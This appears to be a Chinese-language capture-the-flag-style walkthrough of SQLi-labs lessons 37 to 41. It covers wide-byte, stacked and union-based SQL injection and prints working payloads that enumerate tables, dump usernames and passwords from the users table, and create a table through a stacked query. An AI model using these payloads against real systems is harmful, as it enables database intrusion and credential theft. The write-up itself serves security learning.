lesson37_41

lesson37

与lesson34是同种类型的 替身 就是处理post内容，同时包含宽字节注入

因为相同的payload和方法都能用所以我就重新打一遍

�’ union select 1,database()#

�’ union select group_concat(table_name)from information_schema.tables where table_schema=database(),database()#

�’ union select 1,group_concat(column_name)from information_schema.columns where table_name=0x7573657273#

堆叠注入（stacked injection）

内容参考 mysql注入天书

原理

在sql中，分号（；）是用来表示一条sql语句的结束。

用；连接两个句子可以让他们一起执行

联合语句和它的区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。

lesson38 其实用单引号包裹数据的联合注入就可以做

但是网络上很多教程都讲了堆叠注入，所以我也提一下

堆叠注入,创一个库

?id=-1;create table wds5418 like users ;–+

在mysql命令行里发现成功创了一个库，注入成功。

lesson39

无对数据进行包裹的联合注入就可以注入

?id=-1 union select 1,database(),group_concat(table_name)from information_schema.tables where table_schema=database()–+

lesson 40

没有报错的回显

用联合注入查询就可以做，因为没有错误回显，所以要多次尝试出数据包裹方式

然后就没有什么难度了

?id=-1’) union select 1,2,database()–+

?id=-1’) union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

?id=-1’) union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’usrs’–+

?id=-1’) union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users–+

lesson 41

同样没有报错的回显

其实没啥难度，主要花时间的是猜它的包裹方式

?id=-1 union select 1,2,database()–+

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()–+

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’users’–+

?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users–+